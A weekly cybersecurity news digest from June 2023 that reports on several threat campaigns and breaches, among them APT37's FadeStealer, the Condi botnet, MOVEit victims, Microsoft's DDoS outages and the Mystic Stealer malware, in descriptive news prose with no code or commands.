Thursday, June 22nd, 2023
Cybersecurity Week in Review (23/06/2023)
APT37 Hackers Deploy New FadeStealer Eavesdropping Malware
The North Korean APT37 hacking group uses a new ‘FadeStealer’ information-stealing malware containing a ‘wiretapping’ feature, allowing the threat actor to snoop and record from victims’ microphones.
APT37, also known as StarCruft, Reaper, or RedEyes, is believed to be a state-sponsored hacking group with a long history of conducting cyber espionage attacks aligned with North Korean interests. These attacks target North Korean defectors, educational institutions, and EU-based organisations.
In the past, the hackers were known to utilise custom malware called ‘Dolphin’ and ‘M2RAT’ to execute commands and steal data, credentials, and screenshots from Windows devices and even connected mobile phones.
In a new report researchers provide information on new custom malware dubbed ‘AblyGo backdoor’ and ‘FadeStealer’ that the threat actors use in cyber espionage attacks. The malware is believed to be delivered using phishing emails with attached archives containing password-protected Word and Hangul Word Processor documents (.docx and .hwp files) and a ‘password.chm’ Windows CHM file.
It is believed that the phishing emails instruct the recipient to open the CHM file to obtain the password for the documents, which begins the infection process on the Windows device. Once the CHM file is opened, it will display the alleged password to open the document but also quietly downloads and executes a remote PowerShell script that contains backdoor functionality and is registered to autostart with Windows.
This PowerShell backdoor communicates with the attackers’ command and control servers and executes any commands sent by the attackers. The backdoor is used to deploy an additional GoLang backdoor used in the later stages of the attack to conduct privilege escalation, data theft, and the delivery of further malware.
This new backdoor is named ‘AblyGo backdoor,’ as it uses the Ably Platform, an API service that allows developers to deploy real-time features and information delivery in their applications. The threat actors use ABLY as a command and control platform to send base64-encoded commands to the backdoor to execute and then to receive any output, where the threat actors later retrieve it.
As this is a legitimate platform, it is likely used by the threat actors to evade network monitoring and security software. Commands that the attackers used illustrated how they used the backdoor to list the files in a directory, rename a fake .jpg file to an .exe file, and then execute it. However, it is technically possible for the threat actor to send any command they wish to execute.
Ultimately, the backdoors deploy a final payload in the form of ‘FadeStealer,’ an information-stealing malware capable of stealing a wide variety of information from Windows devices. When installed, FadeStealer is injected using DLL sideloading into the legitimate Internet Explorer ‘ieinstall.exe’ process and begins stealing data from the device and storing them in RAR archives every 30 minutes.
The data includes screenshots, logged keystrokes, files collected from connected smartphones, and removable devices. The malware also includes the ability to record audio from a connected microphone, enabling the threat actors to listen in on conversations.
The threat actors can then analyse this collected data to steal sensitive information for use by the North Korean government or conduct further attacks.
APT37 is not the only North Korean threat actor utilising CHM files to deploy malware. It is also reported that the Kimsuky state-sponsored hacking group is utilising CHM files in phishing attacks to deploy malicious scripts that steal user information and install additional malware.
UPS Discloses Data Breach After Exposed Customer Info Used in SMS Phishing
Multinational shipping company UPS is alerting Canadian customers that some of their personal information might have been exposed via its online package look-up tools and abused in phishing attacks.
At first glance, the letters sent by UPS Canada, titled “Fighting phishing and smishing – an update from UPS,” seem to be a warning to customers about the dangers of phishing. However, it turns out that this is actually a data breach notification, with the company sneaking in a disclosure stating that it has been receiving reports of SMS phishing messages containing the recipients’ names and address info.
“UPS is aware that some package recipients have received fraudulent text messages demanding payment before a package can be delivered,” UPS said in a letter.
After receiving the phishing reports, UPS worked with partners within the delivery chain to understand the method used by the threat actors to harvest their targets’ shipping information.
Following an internal review, UPS found that the attackers behind this ongoing SMS phishing campaign were using its package look-up tools to access delivery details, including the recipients’ personal contact information, between February 2022 and April 2023.
The company has now implemented measures designed to restrict access to this sensitive data to thwart these convincing phishing attempts. UPS says it’s notifying individuals whose information may have been affected to ensure transparency and awareness of the situation.
“The information available through the package look-up tools included the recipient’s name, shipment address, and potentially phone number and order number,” UPS said.
“We cannot provide you with the exact time frame that the misuse of our package look-up tools occurred. It may have affected packages for a small group of shippers and some of their customers from February 1, 2022 to April 24, 2023.”
UPS customers worldwide have been affected by these phishing attacks, as shown by online reports showing the threat actors using their names, phone numbers, and postal codes, as well as info on recent orders. According to numerous malicious text, the threat actors are impersonating LEGO and Apple shipments, with other companies likely also impacted.
In September and July, the Internal Revenue Service (IRS) and the Federal Communications Commission (FCC) warned Americans of a massive rise in SMS phishing attacks.
iOttie discloses data breach after site hacked to steal credit cards
Car mount and mobile accessory maker iOttie warns that its site was compromised for almost two months to steal online shoppers’ credit cards and personal information. iOttie is a popular manufacturer of mobile device car mounts, chargers, and accessories.
In a new data breach notification issued yesterday, iOttie says they discovered on June 13th that its online store was compromised between April 12th, 2023, and June 2nd with malicious scripts.
“We believe criminal e-skimming occurred from April 12, 2023, through June 2, 2023. However, on June 2, 2023, during a WordPress/plugin update, the malicious code was removed,” warns the iOttie data breach notification.
“Nevertheless, they could have obtained your credit card information to purchase our client’s product online at www. iOttie.com.”
iOttie has not shared how many customers were impacted but said that names, personal information, and payment information could have been stolen, including financial account numbers, credit and debit card numbers, security codes, access codes, passwords, and PINs.
Due to the detailed information potentially exposed in this attack, all iOttie customers who purchased a product between April 12th and June 2nd should monitor their credit card statements and bank accounts for fraudulent activity.
While iOttie has not shared how they were breached, their online store is a WordPress site with the WooCommerce merchant plugin. WordPress is one of the most commonly targeted website platforms by threat actors, with vulnerabilities often found in plugins that allow complete takeovers of sites or malicious code injection into WordPress templates.
As iOttie disclosed that the malicious code was removed with a plugin update, the hackers likely breached the site using a vulnerability in one of its WordPress plugins. Recently, threat actors have been exploiting vulnerabilities in various WordPress plugins, including cookie consent banners, Advanced Custom Fields, and Elementor Pro.
New ‘RDStealer’ Malware Targets RDP Connections
A state-sponsored espionage campaign is leveraging new custom malware to monitor incoming remote desktop protocol (RDP) connections and infect connecting clients with a backdoor. The campaign has been operational since the beginning of 2022 and appears aligned with the interest of China-based threat actors.
Bearing the hallmarks of a state-sponsored group, the espionage campaign stands out with two custom tools written in the Go programming language — the Logutil backdoor and the RDStealer malware. The threat actor behind these attacks has been active since at least 2020, initially relying on off-the-shelf malware such as AsyncRat and Cobalt Strike. In late 2021, the APT actor shifted to custom malware like RDStealer, which can capture clipboard contents, log keystrokes, and harvest data from the infected machines.
What makes RDStealer special, however, is the capability to monitor incoming RDP connections and infect the connecting clients that have client drive mapping (CDM) enabled.
A virtual channel that allows for data transfers between RDP servers and clients, CDM displays the local drives of the client machine during the remote desktop session. CDM is typically always enabled on clients, with the configuration managed on the server-side.
On an infected machine, RDStealer continuously monitors for RDP connections with CDM enabled and, if one is detected, it notifies the command-and-control (C&C) server, starts exfiltrating data from the connecting client, and deploys the Logutil backdoor on it.
The backdoor leverages multiple DLL sideloading techniques to evade detection, including by abusing the Windows Management Instrumentation service (Winmgmt).
On an infected system, Logutil establishes persistence, communicates with the C&C directly or through a proxy server on the same network, and executes commands retrieved from the C&C, to load DLL libraries, execute commands, download/upload files, and list folders.
Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces
Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials. The credentials were discovered within information stealer logs made available for sale on the cybercrime underground.
The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023. The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year.
Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh.
A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealer (78,348), followed by Vidar (12,984) and RedLine (6,773).
Information stealers have become popular among cybercriminals for their ability to hijack passwords, cookies, credit cards, and other information from browsers, and cryptocurrency wallet extensions. Typically offered based on a subscription-based pricing model, they have not only lowered the bar for cybercrime, but also serve as a conduit for launching follow-on attacks using the siphoned credentials.
To mitigate such risks, it’s recommended that users follow appropriate password hygiene practices and secure their accounts with two-factor authentication (2FA) to prevent account takeover attacks.
The development comes amid an ongoing malware campaign that’s leveraging fake OnlyFans pages and adult content lures to deliver a remote access trojan and an information stealer called DCRat (or DarkCrystal RAT), a modified version of AsyncRAT.
New Condi Malware Builds DDoS Botnet out of TP-Link AX21 Routers
A new DDoS-as-a-Service botnet called “Condi” emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
AX1800 is a popular Linux-based dual-band (2.4GHz + 5GHz) Wi-Fi 6 router with 1.8 Gbps bandwidth, used primarily by home users, small offices, shops, cafes, etc.
Condi aims to enlist new devices to create a powerful DDoS (distributed denial of service) botnet that can be rented to launch attacks on websites and services. Moreover, the threat actors behind Condi sell the malware’s source code, which is an unusually aggressive monetisation method destined to result in numerous project forks with different features.
A new report published this week explains that Condi targets CVE-2023-1389, a high-severity unauthenticated command injection and remote code execution flaw in the API of the router’s web management interface. The flaw was discovered and reported to the network equipment vendor in January 2023, with TP-Link releasing a security update in March with version 1.1.4 Build 20230219.
Condi is the second DDoS botnet to target this vulnerability after Mirai previously exploited it at the end of April. To deal with the attack overlaps, Condi has a mechanism that attempts to kill any processes belonging to known competitor botnets. At the same time, it also stops older versions of itself.
Because Condi doesn’t have a persistence mechanism to survive between device reboots, its authors decided to equip it with a wiper for certain files, which prevents the devices from being shut down or restarted.
For propagation to vulnerable TP-Link routers, the malware scans for public IPs with open ports 80 or 8080 and sends a hardcoded exploitation request to download and execute a remote shell script that infects the new device.
Some samples that were analysed contained a scanner for CVE-2023-1389, but others used different flaws to propagate, so its authors or operators could be experimenting on that front. Additionally, analysts found samples that use a shell script with an ADB (Android Debug Bridge) source, potentially indicating that the botnet is spread through devices with an open ADB port (TCP/5555).
Presumably, this is the direct result of multiple threat actors having bought Condi’s source code, adjusting its attacks as they see fit.
Regarding Condi’s DDoS attack capabilities, the malware supports various TCP and UDP flood methods similar to those of Mirai. Older samples also contain HTTP attack methods; however, these appear to have been stripped in the latest malware version.
Owners of the Archer AX21 AX1800 dual-band Wi-Fi 6 router can get the latest firmware update for their device’s hardware version from TP-Link’s downloads centre. Signs of an infected TP-Link router include device overheating, network disruptions, inexplicable changes in a device’s network settings, and admin user password resets.
Medibank’s Employee Data Leaked in MOVEit Attacks
Medibank, Australia’s largest private health insurer, said that details of the company’s employees were exposed after its property manager fell victim to an attack exploiting the MOVEit flaw.
According to Medibank, one of its property managers, which uses the file transfer software MOVEit, was compromised. A file containing the insurer’s employee names, email addresses, and phone numbers was stolen, Reuters reported.
Medibank said that its systems “have not been impacted by the MOVEit cyberattack,” adding that the exposed file did not have employee bank details, payroll, or home addresses.
“We continue to investigate and work closely with the vendor, and at this stage we are not aware of any of our customers’ data being compromised,” Medibank said.
The staff detail leak comes at a sensitive time for Medibank, as the company is still sifting through the fallout from a previous attack in October 2022. In that incident, hackers stole the sensitive data of around 9.7 million current and former customers.
Medibank is currently facing three class action lawsuits in relation to the breach, and is also under investigation by the country’s privacy regulator regarding its handling of personal information.
They were not the only organisation to disclose that they were victims of the MOVEit attacks. Gen Digital (NASDAQ: GEN), the company behind known cybersecurity brands such as Avast, Avira, AVG, Norton, and LifeLock, also confirmed that employee’s personal information was compromised in the recent attack.
Other known victims of the MOVEit zero-day attacks include the U.S. Department of Energy, Louisiana’s Office of Motor Vehicles, Oregon’s Department of Transportation, the Nova Scotia government, British Airways, the British Broadcasting Company, Aer Lingus, U.K. drugstore chain Boots, University of Rochester, the Illinois Department of Innovation & Technology (DoIT), and the Minnesota Department of Education (MDE).
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs.
The threat activity is being tracked under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), described as a true advanced persistent threat.
The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers to infiltrate target networks. Failed attempts to execute the China Chopper web shell was detected in one of the attacks, prompting the adversary to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
A successful break-in is followed by reconnaissance activity to map out the network and single out critical servers that hold data of value, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.
CL-STA-0043 has also been observed leveraging native Windows tools for privilege escalation, thereby enabling it to create admin accounts and run other programs with elevated privileges.
Another privilege escalation method entails the abuse of accessibility features in Windows – i.e., the “sticky keys” utility (sethc.exe) – that makes it possible to bypass login requirements and backdoor the systems. A similar approach employing the Utility Manager (utilman.exe) to establish persistent backdoor access to a victim’s environment was documented earlier this April.
Besides using Mimikatz for credential theft, the threat actor’s modus operandi stands out for utilising other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as –
- Using network providers to execute a malicious DLL to harvest and export plaintext passwords to a remote server
- Leveraging an open-source penetration testing toolset called Yasso to spread across the network, and
- Taking advantage of the Exchange Management Shell and PowerShell snap-ins to harvest emails of interest
It’s worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state-sponsored group referred to as Silk Typhoon (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server.
Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions
Microsoft on Friday attributed a string of service outages aimed at Azure, Outlook, and OneDrive earlier this month to an uncategorised cluster it tracks under the name Storm-1359.
“These attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools,” the tech giant said in a post on Friday.
Storm-#### (previously DEV-####) is a temporary designation the Windows maker assigns to unknown, emerging, or developing groups whose identity or affiliation hasn’t been definitively established yet.
While there is no evidence that any customer data was accessed or compromised, the company noted the attacks “temporarily impacted availability” of some services. The threat actor was further observed launching layer 7 DDoS attacks from multiple cloud services and open proxy infrastructures.
This includes HTTP(S) flood attacks, which bombard the target services with a high volume of HTTP(S) requests; cache bypass, in which the attacker attempts to bypass the CDN layer and overload the origin servers; and a technique known as Slowloris.
“This attack is where the client opens a connection to a web server, requests a resource (e.g., an image), and then fails to acknowledge the download (or accepts it slowly),” the Microsoft Security Response Center (MSRC) said. “This forces the web server to keep the connection open and the requested resource in memory.”
Microsoft 365 services such as Outlook, Teams, SharePoint Online, and OneDrive for Business went down at the start of the month, with the company subsequently stating it had detected an “anomaly with increased request rates.”
“Traffic analysis showed an anomalous spike in HTTP requests being issued against Azure portal origins, bypassing existing automatic preventive measures, and triggering the service unavailable response,” it said.
Microsoft further characterised the actors as focused on disruption and publicity. A hacktivist group known as Anonymous Sudan has claimed responsibility for the attacks. However, it’s worth noting that the company has not explicitly linked Storm-1359 to Anonymous Sudan.
Anonymous Sudan has been making waves in the threat landscape with a series of DDoS attacks against Swedish, Dutch, Australian, and German organisations since the start of the year. Analysis in late March 2023 indicated that the adversary is likely an offshoot of the Pro-Russian threat actor group KillNet that first gained notoriety during the Russian-Ukraine conflict last year.
KillNet has also attracted attention for its DDoS attacks on healthcare entities hosted in Microsoft Azure, which have surged from 10-20 attacks in November 2022 to 40-60 attacks daily in February 2023.
The Kremlin-affiliated collective, which first emerged in October 2021, has further established a “private military hacking company” named Black Skills in an attempt to lend its cyber mercenary activities a corporate sheen.
Anonymous Sudan’s Russian connections have also become evident in the wake of its collaboration with KillNet and REvil to form a “DARKNET parliament” and orchestrate cyber attacks on European and U.S. financial institutions. “Task number one is to paralyse the work of SWIFT,” a message posted on June 14, 2023, read.
New Mystic Stealer Malware Increasingly Used in Attacks
A new information-stealing malware named ‘Mystic Stealer,’ has been promoted on hacking forums and darknet markets since April 2023, quickly gaining traction in the cybercrime community.
The malware, rented for $150/month, targets 40 web browsers, 70 browser extensions, 21 cryptocurrency applications, 9 MFA and password management applications, 55 cryptocurrency browser extensions, Steam and Telegram credentials, and more.
Reports on Mystic Stealer warn about the emergence of the new malware, its sophistication, and what appears to be a surge in sales that brings many new campaigns online.
Mystic Stealer debuted version 1.0 in late April 2023 but quickly ramped up to version 1.2 towards the end of May, indicating an active development for the project. The seller advertised the new malware on multiple hacking forums, including the WWH-Club, BHF, and XSS, renting it to interested individuals for the competitive subscription price of $150 per month or $390 per quarter.
The project also operates a Telegram channel (Mystic Stealer News) where development news, feature requests, and other relevant topics are discussed. It is reported that the creator of the new malware accepts feedback from established members of the underground hacking community and openly invites them to share suggestions for improving Mystic.
Mystic Stealer can target all Windows versions, including XP to 11, supporting 32 and 64-bit OS architectures. The malware does not need any dependencies, so its footprint on infected systems is minimal, while it operates in memory to avoid detection from anti-virus products.
Moreover, Mystic performs several anti-virtualisation checks, like inspecting the CPUID details to ensure it is not executed in sandboxed environments. Mystic’s author has added an exclusion for Commonwealth of Independent States (CIS) countries (formerly the Soviet Union), which could indicate the new malware’s origin.
Another restriction set by the creator is to prevent the malware from running builds older than a specified date, possibly to minimise the malware’s exposure to security researchers. Starting May 20, 2023, the malware’s author added a loader functionality allowing Mystic to fetch additional payloads from the C2 server.
All communication with the C2 is encrypted using a custom binary protocol over TCP, while all stolen data is sent directly to the server without first storing it on the disk. This is an unusual approach for info-stealer malware but helps Mystic evade detection.
The operator can configure up to four C2 endpoints for resiliency, which are encrypted using a modified XTEA-based algorithm. Upon first execution, Mystic gathers OS and hardware information and snaps a screenshot, sending the data to the attacker’s C2 server. Depending on the instructions it receives, the malware will target more specific data stored in web browsers, applications, etc.
Although the future of Mystic Stealer is still in debate, considering the volatile nature of illegal MaaS projects, its emergence signals elevated risk for users and organisations. The recent addition of a loader could help Mystic operators drop payloads such as ransomware onto compromised computers, so extreme caution is advised when downloading software from the internet.